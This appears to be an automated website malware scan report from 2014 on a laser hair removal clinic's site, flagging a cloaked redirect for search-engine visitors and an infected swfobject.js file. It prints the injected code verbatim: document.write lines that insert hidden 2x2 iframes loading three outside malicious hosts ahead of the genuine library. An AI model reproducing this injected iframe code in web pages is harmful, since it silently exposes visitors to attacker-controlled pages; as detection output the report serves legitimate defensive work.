Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.laserhairremovalnewyorkcity.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.laserhairremovalnewyorkcity.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 10 Sep 2014 18:08:30 GMT Location: http://from-ai-dai-lane.bplaced.net/aawf.html?h=1278392 Server: Apache Content-Length: 324 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.laserhairremovalnewyorkcity.com/ | 200 OK Content-Length: 13872 Content-Type: text/html | clean |
http://widgets.twimg.com/j/2/widget.js | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
http://www.laserhairremovalnewyorkcity.com/index.php | 200 OK Content-Length: 13872 Content-Type: text/html | clean |
http://www.laserhairremovalnewyorkcity.com/Procedures.php | 200 OK Content-Length: 12889 Content-Type: text/html | clean |
http://www.laserhairremovalnewyorkcity.com/Our-Culture.php | 200 OK Content-Length: 10007 Content-Type: text/html | clean |
http://www.laserhairremovalnewyorkcity.com/our-place.php | 200 OK Content-Length: 9753 Content-Type: text/html | clean |
http://www.laserhairremovalnewyorkcity.com/our-locale.php | 200 OK Content-Length: 10217 Content-Type: text/html | clean |
http://www.laserhairremovalnewyorkcity.com/faq.php | 200 OK Content-Length: 23275 Content-Type: text/html | clean |
http://www.laserhairremovalnewyorkcity.com/blog | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 18:08:35 GMT Location: http://www.laserhairremovalnewyorkcity.com/blog/ Server: Apache Content-Length: 341 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.laserhairremovalnewyorkcity.com/blog/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 18:08:35 GMT Location: http://laserhairremovalnewyorkcity.com/blog/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://laserhairremovalnewyorkcity.com/blog/xmlrpc.php | clean |
http://laserhairremovalnewyorkcity.com/blog/ | 200 OK Content-Length: 19466 Content-Type: text/html | clean |
http://laserhairremovalnewyorkcity.com/blog/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 18:08:38 GMT Location: http://laserhairremovalnewyorkcity.com/blog/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://laserhairremovalnewyorkcity.com/blog/xmlrpc.php | clean |
http://laserhairremovalnewyorkcity.com/test404page.js | 404 Not Found Content-Length: 412 Content-Type: text/html | clean |
http://www.laserhairremovalnewyorkcity.com/promotion.php | 200 OK Content-Length: 9653 Content-Type: text/html | clean |
http://www.laserhairremovalnewyorkcity.com/Financing.php | 200 OK Content-Length: 10960 Content-Type: text/html | clean |
http://www.laserhairremovalnewyorkcity.com/media.php | 200 OK Content-Length: 25353 Content-Type: text/html | clean |
http://www.laserhairremovalnewyorkcity.com/before-after.php | 200 OK Content-Length: 11047 Content-Type: text/html | clean |
http://www.laserhairremovalnewyorkcity.com/includes/swfobject.js | 200 OK Content-Length: 10710 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: geiscoinc.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1278392></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://geiscoinc.com/ezes.html?j=1278392></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://e-captives.com/mwai.html?j=1278392></iframe>'); var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=n ...[3511 bytes skipped]... Decoded script: function f() { if (J) { return; } try { var Z = j.getElementsByTagName("body")[0].appendChild(C("span")); Z.parentNode.removeChild(Z); } catch (aa) { return; } J = true; var X = U.length; for (var Y = 0; Y < X; Y++) { U[Y](); } } <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1278392></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://geiscoinc.com/ezes.html?j=1278392></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://e-captives.com/mwai.html?j=1278392></iframe> Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1278392 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1278392> Malicious iFrame found. size: 2x2 src: http://geiscoinc.com/ezes.html?j=1278392 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://geiscoinc.com/ezes.html?j=1278392> Hidden iFrame found. size: 2x2 src: http://e-captives.com/mwai.html?j=1278392 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://e-captives.com/mwai.html?j=1278392> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=laserhairremovalnewyorkcity.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://laserhairremovalnewyorkcity.com/
Result: laserhairremovalnewyorkcity.com is not infected or malware details are not published yet.
Result: laserhairremovalnewyorkcity.com is not infected or malware details are not published yet.